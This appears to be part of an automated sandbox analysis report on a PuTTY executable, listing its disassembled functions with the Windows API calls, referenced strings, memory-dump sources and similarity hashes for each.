Part of subcall function 00007FF6BB353098: FlsGetValue.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB3530BC
Part of subcall function 00007FF6BB353098: SetLastError.KERNEL32(?,?,?,00007FF6BB342CFB,?,?,?,00007FF6BB34C131), ref: 00007FF6BB353147

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6BB3597D3,00000000,00000092,?,?,00000000,?,?,00007FF6BB3488F9), ref: 00007FF6BB359DAE

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: abb5f3cec4ff362770d1342f42244cd9a48485c11d3d4892fe7aa86ca48b9eee
Instruction ID: e37f43dc91b7619c2575dc8078b401fb36c856bc8e2e7cdb72ff258c7ffe86cc
Opcode Fuzzy Hash: abb5f3cec4ff362770d1342f42244cd9a48485c11d3d4892fe7aa86ca48b9eee
Instruction Fuzzy Hash: 8601D8B2F0828146EB105F19E4507B976E5FB44BA4F558331D769872E8DF7C94898B04

Function 00007FF6BB352EDC Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6BB3522B7,?,?,?,?,?,?,?,?,00000000,00007FF6BB35943C), ref: 00007FF6BB352F2B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 8a0dd470fdcead8dddeb2970784ad091dbe112c6c0a7a92d94a8fdedb158568e
Instruction ID: 7218f692e21643537ba699bbaf2356b9b25aa74e79b0b91c1cade5429dc85b37
Opcode Fuzzy Hash: 8a0dd470fdcead8dddeb2970784ad091dbe112c6c0a7a92d94a8fdedb158568e
Instruction Fuzzy Hash: 97F0F6B2A08A8582EA04DB29F8901A93361BB9C780F648135EB5DC3765EF3CD5558B44

Function 00007FF6BB2C0DE0 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2AC7B0: WSAAsyncSelect.WS2_32 ref: 00007FF6BB2AC803

recv.WS2_32 ref: 00007FF6BB2C0E29

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AsyncSelectrecv
String ID:
API String ID: 3881473523-0
Opcode ID: f3ce5cf4d50df0b3d745acc74cdbada7605895cccbc6249d645d1e403d16cc15
Instruction ID: f60e6139433e21d71bd2e57e5a0b821757b5b66d256ddec8467e946aa52ea889
Opcode Fuzzy Hash: f3ce5cf4d50df0b3d745acc74cdbada7605895cccbc6249d645d1e403d16cc15
Instruction Fuzzy Hash: 81F06265B0C59544FB30D72DF09537E7B90AB4D798F145039CB8C47761DE6ED1868701

Function 00007FF6BB2AAA80 Relevance: 1.5, APIs: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,?,?,?,?,?,00007FF6BB2BE0A2), ref: 00007FF6BB2AAAB3

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 03de8d71a4be3953e10ae13e30a1e1ff27b4efe455a589614f809a35615d1a43
Instruction ID: 78443c8da534f977813e1ae7d644a68491aa3f81c3c800cc658e994a2eec238f
Opcode Fuzzy Hash: 03de8d71a4be3953e10ae13e30a1e1ff27b4efe455a589614f809a35615d1a43
Instruction Fuzzy Hash: 50F0F925A18A0581EA10DB2AE49516E77A0FBCDB98F914132DA4E83734DF3CD105CB00

Function 00007FF6BB2897B0 Relevance: 1.5, APIs: 1, Instructions: 20windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00007FF6BB2897BE

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: 10cf379f24bfc43fcae4904e280508b7dd88773fb5e8743b59419ce5c49c7734
Instruction ID: ff3c9930ed988c3b1283bd8028b4ec08c1491f1aef022b97249857ac7fd313b3
Opcode Fuzzy Hash: 10cf379f24bfc43fcae4904e280508b7dd88773fb5e8743b59419ce5c49c7734
Instruction Fuzzy Hash: BAE04F81F0950681FB548B59A9913391291BF9C744F681030CB5CCBAF4EF3CA8958B00

Function 00007FF6BB281BD7 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 165windowCOMMON

Download Yara Rule

APIs

HideCaret.USER32 ref: 00007FF6BB281BDA
BeginPaint.USER32 ref: 00007FF6BB281BEB
SelectPalette.GDI32 ref: 00007FF6BB281C09
RealizePalette.GDI32 ref: 00007FF6BB281C12
CreateSolidBrush.GDI32(?), ref: 00007FF6BB281D3E
SelectObject.GDI32 ref: 00007FF6BB281D54
CreatePen.GDI32 ref: 00007FF6BB281D65
SelectObject.GDI32 ref: 00007FF6BB281D74
IntersectClipRect.GDI32 ref: 00007FF6BB281D9F
ExcludeClipRect.GDI32 ref: 00007FF6BB281DE2
Rectangle.GDI32 ref: 00007FF6BB281E0D
SelectObject.GDI32 ref: 00007FF6BB281E19
DeleteObject.GDI32 ref: 00007FF6BB281E26
SelectObject.GDI32 ref: 00007FF6BB281E2E
DeleteObject.GDI32 ref: 00007FF6BB281E34
GetStockObject.GDI32 ref: 00007FF6BB281E42
SelectObject.GDI32 ref: 00007FF6BB281E51
GetStockObject.GDI32 ref: 00007FF6BB281E58
SelectObject.GDI32 ref: 00007FF6BB281E60
EndPaint.USER32 ref: 00007FF6BB281E70
ShowCaret.USER32 ref: 00007FF6BB281E79

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB281C2C
!wintw_hdc, xrefs: 00007FF6BB281C25

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
String ID: !wintw_hdc$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c
API String ID: 4109966220-2668247132
Opcode ID: 329f361bb8f13bd28862b3555d1e71d4b298ea3fec208f4ed789b3c635bb196e
Instruction ID: f99706e195dd33f734c7bcb0e4323a3c79f3ac16fb264f1d7c7600b9703f98fc
Opcode Fuzzy Hash: 329f361bb8f13bd28862b3555d1e71d4b298ea3fec208f4ed789b3c635bb196e
Instruction Fuzzy Hash: EE714C35A082828AEB24DB1AFC546B977A1FB8CB95F944135CE4E87B74DE7CA441CF00

Function 00007FF6BB32B240 Relevance: 38.6, APIs: 13, Strings: 9, Instructions: 127filepipeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B307
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B30F
WaitNamedPipeA.KERNEL32 ref: 00007FF6BB32B322
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B329

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Part of subcall function 00007FF6BB2C6F90: GetCurrentProcessId.KERNEL32 ref: 00007FF6BB2C6FD0
Part of subcall function 00007FF6BB2C6F90: OpenProcess.KERNEL32 ref: 00007FF6BB2C6FE2
Part of subcall function 00007FF6BB2C6F90: GetLastError.KERNEL32 ref: 00007FF6BB2C7033
Part of subcall function 00007FF6BB2C6F90: LocalAlloc.KERNEL32 ref: 00007FF6BB2C7058
Part of subcall function 00007FF6BB2C6F90: GetLengthSid.ADVAPI32 ref: 00007FF6BB2C708A
Part of subcall function 00007FF6BB2C6F90: CopySid.ADVAPI32 ref: 00007FF6BB2C70AE
Part of subcall function 00007FF6BB2C6F90: CloseHandle.KERNEL32 ref: 00007FF6BB2C70D4
Part of subcall function 00007FF6BB2C6F90: CloseHandle.KERNEL32 ref: 00007FF6BB2C70E4
Part of subcall function 00007FF6BB2C6F90: LocalFree.KERNEL32 ref: 00007FF6BB2C70F2

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B38E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B394

Part of subcall function 00007FF6BB2C7AD0: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF6BB2BDCDB), ref: 00007FF6BB2C7B7B

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B3CE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B3D4
EqualSid.ADVAPI32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B420
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B42F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B43A
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF6BB32B48B), ref: 00007FF6BB32B445

Strings

Owner of named pipe '%s' is not us, xrefs: 00007FF6BB32B44B
\\.\pipe\, xrefs: 00007FF6BB32B262
Unable to get user SID: %s, xrefs: 00007FF6BB32B3E1
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-client.c, xrefs: 00007FF6BB32B27F, 00007FF6BB32B2AB
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00007FF6BB32B278
strchr(pipename + 9, '\\') == NULL, xrefs: 00007FF6BB32B2A4
Error waiting for named pipe '%s': %s, xrefs: 00007FF6BB32B336
Unable to open named pipe '%s': %s, xrefs: 00007FF6BB32B3B7
Unable to get named pipe security information: %s, xrefs: 00007FF6BB32B3A1

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: CloseErrorHandleLast$Local$Free$Process$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait_set_error_mode
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
API String ID: 1091246219-3978821697
Opcode ID: d677df9f2a73e2b24b901285e670e97e10afab5bd0461f87eb4ad6523a0a6656
Instruction ID: 73dde4b4ad592f3d51877e7ee6f557217fda0eb4dce97210fd8333f22c933522
Opcode Fuzzy Hash: d677df9f2a73e2b24b901285e670e97e10afab5bd0461f87eb4ad6523a0a6656
Instruction Fuzzy Hash: 91516D21A18A4281FA10AB29E8542BE6361FF8DBA0F544235DF5EC77F5EF3CE5458B40

Function 00007FF6BB2CAC60 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2C62C0: LoadLibraryA.KERNELBASE ref: 00007FF6BB2C62E9

GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CACA8
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CACBB
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CACCE
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CACE1
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CACF4
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CAD07
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CAD1A
GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF6BB2CABC2), ref: 00007FF6BB2CAD2D

Strings

EnumPrintersA, xrefs: 00007FF6BB2CAC97
StartPagePrinter, xrefs: 00007FF6BB2CACFD
ClosePrinter, xrefs: 00007FF6BB2CACC4
WritePrinter, xrefs: 00007FF6BB2CAD23
EndDocPrinter, xrefs: 00007FF6BB2CACEA
OpenPrinterA, xrefs: 00007FF6BB2CACB1
EndPagePrinter, xrefs: 00007FF6BB2CAD10
spoolss.dll, xrefs: 00007FF6BB2CAC82
StartDocPrinterA, xrefs: 00007FF6BB2CACD7
winspool.drv, xrefs: 00007FF6BB2CAC73

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
API String ID: 2238633743-2130675966
Opcode ID: 5d34a62ff6923a37ec75bce0a6e43a3e0f4bdbf85847eef7222ddaf8b7e92ab6
Instruction ID: c3b34f97b10b0372ae78012b7fba3f28d04578815331f7d37ceda8c9e7d23f74
Opcode Fuzzy Hash: 5d34a62ff6923a37ec75bce0a6e43a3e0f4bdbf85847eef7222ddaf8b7e92ab6
Instruction Fuzzy Hash: 0031F72090DF6290FA019B1CFD547B933A5BF48781F644136CA4CCABB0DFBDA1458785

Function 00007FF6BB2C6DD0 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6E15
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6E42
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6E6F
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6E9C
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6EC9
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6EF2
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,-00000001,-00000008,00000000,00000001,00000000,00007FF6BB2C73AA), ref: 00007FF6BB2C6F17

Strings

advapi32.dll, xrefs: 00007FF6BB2C6DEF
SetEntriesInAclA, xrefs: 00007FF6BB2C6F10
SetSecurityInfo, xrefs: 00007FF6BB2C6E3B
InitializeSecurityDescriptor, xrefs: 00007FF6BB2C6EC2
SetSecurityDescriptorOwner, xrefs: 00007FF6BB2C6EEB
OpenProcessToken, xrefs: 00007FF6BB2C6E68
GetTokenInformation, xrefs: 00007FF6BB2C6E95
GetSecurityInfo, xrefs: 00007FF6BB2C6E0B

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: AddressProc
String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
API String ID: 190572456-1260934078
Opcode ID: dc409bd693eb581b9abf2cc8e4bced2ab8f4a0f8dfa324d93cdea605e237d640
Instruction ID: f6a8765c32d41fdb408f5f58ff20b496220bac1e991f2f4ec334e69e56864b4f
Opcode Fuzzy Hash: dc409bd693eb581b9abf2cc8e4bced2ab8f4a0f8dfa324d93cdea605e237d640
Instruction Fuzzy Hash: D7416C24A0EB5399FE568B1CAA6437837A0BF4C740F680539D64ED62B0EF7CE5489B11

Function 00007FF6BB28C870 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 00007FF6BB28C88E
IsZoomed.USER32 ref: 00007FF6BB28C8B8
GetWindowLongPtrA.USER32 ref: 00007FF6BB28C8CE
GetWindowLongPtrA.USER32 ref: 00007FF6BB28C8EB
SetWindowLongPtrA.USER32 ref: 00007FF6BB28C924
GetMonitorInfoA.USER32 ref: 00007FF6BB28C95E
GetDesktopWindow.USER32 ref: 00007FF6BB28C970
GetClientRect.USER32 ref: 00007FF6BB28C97E
SetWindowPos.USER32 ref: 00007FF6BB28C9B5
CheckMenuItem.USER32 ref: 00007FF6BB28C9DB
CheckMenuItem.USER32 ref: 00007FF6BB28C9EF

Part of subcall function 00007FF6BB34B8AC: _set_error_mode.LIBCMT ref: 00007FF6BB34B8D3

Strings

IsZoomed(wgs.term_hwnd), xrefs: 00007FF6BB28C898
, xrefs: 00007FF6BB28C9AB
(, xrefs: 00007FF6BB28C94E
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00007FF6BB28C89F

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopInfoMonitorRect_set_error_mode
String ID: $($/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$IsZoomed(wgs.term_hwnd)
API String ID: 4273497163-3011776329
Opcode ID: 520dea7fe602c2f9dd07488789dc92ce8ea38919019d3a466e26912135ed10b2
Instruction ID: a81efd6fe2263a4e08f732a5c191a2c9997fb234df3116db48ecd6a418981334
Opcode Fuzzy Hash: 520dea7fe602c2f9dd07488789dc92ce8ea38919019d3a466e26912135ed10b2
Instruction Fuzzy Hash: 7D412725A08A0286FA509B69E85437E7760FF8CB90F644235DB9D93BB4DF3CE4498F00

Function 00007FF6BB2AC180 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 239COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BB2D6500: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00007FF6BB2AB996), ref: 00007FF6BB2D651C

wcsftime.LIBCMT ref: 00007FF6BB2AC1E1

Strings

Outgoing, xrefs: 00007FF6BB2AC1EF, 00007FF6BB2AC24B
on behalf of downstream #%u, xrefs: 00007FF6BB2AC2A3
Incoming, xrefs: 00007FF6BB2AC1E8, 00007FF6BB2AC244
%Y-%m-%d %H:%M:%S, xrefs: 00007FF6BB2AC1CA
XX, xrefs: 00007FF6BB2AC415
(%zu byte%s omitted), xrefs: 00007FF6BB2AC3B5, 00007FF6BB2AC532
%s raw data at %s, xrefs: 00007FF6BB2AC1FA
type %d / 0x%02x (%s), xrefs: 00007FF6BB2AC281
%02x, xrefs: 00007FF6BB2AC442
#0x%lx, , xrefs: 00007FF6BB2AC26D
%08zx%*s, xrefs: 00007FF6BB2AC3E6
%s packet , xrefs: 00007FF6BB2AC256
(%s), xrefs: 00007FF6BB2AC2BA

Memory Dump Source

Source File: 00000015.00000002.2575814271.00007FF6BB281000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF6BB280000, based on PE: true

Associated: 00000015.00000002.2575762338.00007FF6BB280000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576044138.00007FF6BB36A000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576135877.00007FF6BB3AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B1000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576202315.00007FF6BB3B9000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2576284091.00007FF6BB3BD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff6bb280000_putty.jbxd

Similarity

API ID: LocalTimewcsftime
